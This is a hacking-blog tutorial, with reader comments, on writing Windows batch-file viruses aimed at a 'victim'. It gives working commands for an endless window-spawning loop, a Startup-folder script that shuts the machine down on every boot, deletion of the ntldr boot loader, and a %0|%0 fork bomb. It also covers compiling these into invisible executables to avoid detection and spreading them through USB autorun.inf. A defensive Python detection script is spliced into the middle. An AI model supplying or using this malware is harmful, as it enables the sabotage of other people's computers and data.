
How to create Batch file viruses?


What are Batch Files ?

According to Wikipedia, a batch file is a text file containing a series of commands intended to be executed by the command interpreter. In this article I will cover the basics of batch files and develop the approach towards coding your own viruses. Let's begin with a simple example.


Open your command prompt and change your current directory to 'desktop' by typing 'cd desktop' without quotes.
Now type these commands one by one

1. md x //makes directory 'x' on desktop
2. cd x // changes current directory to 'x'
3. md y // makes a directory 'y' in directory 'x'



We first make a folder/directory 'x', then enter folder 'x', then make a folder 'y' inside folder 'x'.
Now delete the folder 'x'.
Let's do the same thing another way. Copy these three commands into Notepad and save the file as anything.bat




Now just double-click this batch file and the same work is done: you will get a folder 'x' on your desktop with a folder 'y' in it. This means the three commands were executed line by line when we ran the batch file.

So a batch file is simply a text file containing a series of commands which are executed automatically, line by line, when the batch file is run.

What can batch viruses do ?

They can be used to delete Windows files, format data, steal information, consume CPU resources to affect performance, disable firewalls, open ports, modify or destroy the registry, and for many more purposes.

Now let's start with some simple code.

Note: Type 'help' in the command prompt to learn about some basic commands. To learn how to use a particular command, type 'command_name /?' without quotes.


1.


:x
start cmd.exe
goto x // infinite loop

This code opens Command Prompt windows in an endless loop, irritating the victim and affecting performance.


2.  copy anything.bat “C:\Documents and Settings\Administrator\Start Menu\Programs\Startup
copy anything.bat “C:\Documents and Settings\All Users\Start Menu\Programs\Startup” //these two commands will copy the batchfile in start up folders (in XP)
shutdown -s -t 00 //this will shutdown the computer in 0 seconds

Note: Files in the Startup folder are started automatically when Windows starts.


Every time the victim starts the computer, the batch file in the Startup folder runs and shuts down the computer immediately. You can remove this virus by booting the computer in Safe Mode and deleting the batch file from the Startup folder.

3. Go to the C drive in Win XP, then Tools -> Folder Options -> View.
Now uncheck the option 'Hide operating system files' and check the option 'Show hidden files and folders'. Click Apply.

Now you can see the operating system files. One of them is 'ntldr', the boot loader used to boot Windows.



Let's make a batch file to delete this file from the victim's computer, after which Windows will not start.
attrib -S -R -H C:\ntldr // -S,-R,-H to clear system file attribute, read only attribute , hidden file attribute respectively
del C:\ntldr //delete ntldr file

After running this batch file, the system will not reboot, and a normal victim would definitely install Windows again.




4.%0|%0 //Its percentage zero pipe percentage zero

This code creates a large number of processes very quickly in order to saturate the Windows process table. It will simply hang Windows. This is known as a 'fork bomb'.
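Seen from the defender's side, the four samples above are plain text and reduce to a handful of recognisable command patterns. The following Python triage is an added example, not code from the original post; the rule names and the sample scripts are constructed for illustration, and the rules are heuristics rather than a complete detector.

```python
import re

# Heuristic rules (rule names are illustrative) for the behaviours described above.
RULES = [
    ("self-pipe fork bomb", re.compile(r"%0\s*\|\s*%0")),
    ("copy into Startup folder",
     re.compile(r"\bcopy\b.*\\Start Menu\\Programs\\Startup", re.I)),
    ("immediate shutdown", re.compile(r"\bshutdown\b.*[-/]s\b.*[-/]t\s*0+\b", re.I)),
    ("boot loader tampering", re.compile(r"\b(attrib|del|erase)\b.*\\ntldr\b", re.I)),
]
LABEL = re.compile(r"^\s*:(\w+)")
GOTO = re.compile(r"^\s*goto\s+:?(\w+)", re.I)
START = re.compile(r"^\s*start\b", re.I)

def triage(script):
    """Return sorted (line_number, finding) pairs for the text of a batch file."""
    lines = script.splitlines()
    findings = []
    labels = {}  # label name -> line number where it was defined
    for n, line in enumerate(lines, 1):
        findings += [(n, name) for name, rx in RULES if rx.search(line)]
        label = LABEL.match(line)
        if label:
            labels[label.group(1).lower()] = n
        jump = GOTO.match(line)
        if jump and jump.group(1).lower() in labels:
            # Backward jump: inspect the loop body between label and goto.
            body = lines[labels[jump.group(1).lower()]:n - 1]
            if any(START.match(b) for b in body):
                findings.append((n, "unbounded process-spawn loop"))
    return sorted(findings)

# Constructed samples built from the commands quoted in this article.
SUSPICIOUS = r"""@echo off
:x
start cmd.exe
goto x
copy anything.bat "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
shutdown -s -t 00
attrib -S -R -H C:\ntldr
del C:\ntldr
%0|%0
"""
BENIGN = "md x\ncd x\nmd y\n"

if __name__ == "__main__":
    for line_no, finding in triage(SUSPICIOUS):
        print(f"line {line_no}: {finding}")
    print("benign findings:", triage(BENIGN))
```

The folder-creation commands from the first section produce no findings, while every behaviour in the numbered samples is reported with its line number.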



The viruses we just coded -: 




 


Note: Most of the batch viruses are simply undetectable by any antiviruses.
 
Tip : Coding good viruses just depends on the DOS commands you know and logic you use.

Limitations of Batch Viruses -:

1. The victim can easily read the commands by opening the batch file in Notepad.
2. The command prompt screen pops up, which alerts the victim, and he can stop it.

To overcome these limitations, we need to convert these batch files into executable files, that is, exe files.


Download this Batch To Exe converter from here.
http://www.mediafire.com/?uhsc5tfkd5dbn65

 
After running the converter, open the batch file virus, save it as an exe file, set the visibility mode to 'Invisible application', then just click the compile button.



 


You can use other options as per your requirement.

Spreading batch viruses through pen drive -:


Step 1. 

 
Open notepad and write 



[autorun]
open=anything.bat
Icon=anything.ico

Save the file as ‘autorun.inf’.


Step 2. Put this ‘autorun.inf’ and your actual batch virus ‘anything.bat’ on the pen drive.

When the victim plugs in the pen drive, autorun.inf will launch anything.bat and the commands in the batch file virus will execute.



About The Author

This is a guest post written by Aneesh M Makker. Aneesh M. Makker is an Ethical hacker from Malout, a town in Punjab.


19 comments :

Vinay on October 21, 2010 at 9:21 PM said...

I am new to your blog. Excellent batch tutorial ever read. How can we solve the 'missing ntldr' problem without reinstalling Windows?

Aneesh said...

Insert windows cd , go to REPAIR and copy ntldr file OR simply insert Hiren bootable disk and You will get 'Fix ntldr missing' option

Cheap SSL Certificates on October 22, 2010 at 5:15 AM said...

Very nicely described about batch file. I just say "wonderful" and very useful too so thanks for posting this post.

pratik on October 22, 2010 at 5:40 AM said...

n also plz tell the way to protect ourself from the same..
i mean if i'll plug the pendrive in my lappy then i'll also be get effected of the virus

Rahul on October 22, 2010 at 6:28 AM said...

Thanx for the tutorial. It really helped me for making small viruses. Plz can u tell me or post me some more batch commands to create viruses or other methods to create viruses. It will be really helpful if u do.
Plz post me on hacking.cracking.tricks@gmail.com

Hacking Tricks on October 22, 2010 at 8:54 AM said...

great tutorial thanks..include some more batch commands

Aneesh said...

Thanx guyz

@pratik
Disable your autorun feature . You can do this by editing windows registry.
@rahul
Search for the batch file viruses codes , learn about the commands used in codes and try to understand the logic rather than just doing copy paste.

Vinay on October 22, 2010 at 8:27 PM said...

Ya Hiren Bootable Cd gives that option , I will try to use. Thx

Kaito said...

@aneesh
If you give a man a fish, you feed him a day.
If you ask the man to learn how to fish, you feed him his life.

Anonymous said...

hey I was wondering, does the above batch work for all versions of Windows? e.g. Win7, Win Vista

Anonymous said...

hey , please write all commands so that i could copy

bothsider on January 15, 2011 at 2:30 PM said...

There are lots of programs to compile bat2exe, why have you named only one of them? I used Dr.Batcher (http://www.drbatcher.com ) to compile BAT to EXE, it works great.

Anonymous said...

his suggested bat to exe compiler was probably the only one he knows of that can set invisibility mode

Marwan said...

one of the most brilliant articles I have ever read...thanks

Anonymous said...

How to remove fork bomb virus, i have the same condition to my task manager, when i start my computer every time, any virus creates a large number of processes very quickly in order to saturate the process table of windows.
What should i do, Please Help me !

Dhiarya said...

hey dude, for entering my batch virus in pen drive I know what is autorun.inf but what to put in anything.bat

Anonymous said...

Real trojan code

Anonymous said...

I think your tips are cool

Anonymous said...

cool bro


About

Rafay Baloch is an independent security researcher, Internet marketer, entrepreneur and SEO consultant. He is the founder of the RHA blog and multiple other blogs. Rafay got famous after finding a Remote Code Execution bug inside PayPal, for which PayPal awarded him a sum of 10,000$.

RHA © 2013. All Rights Reserved.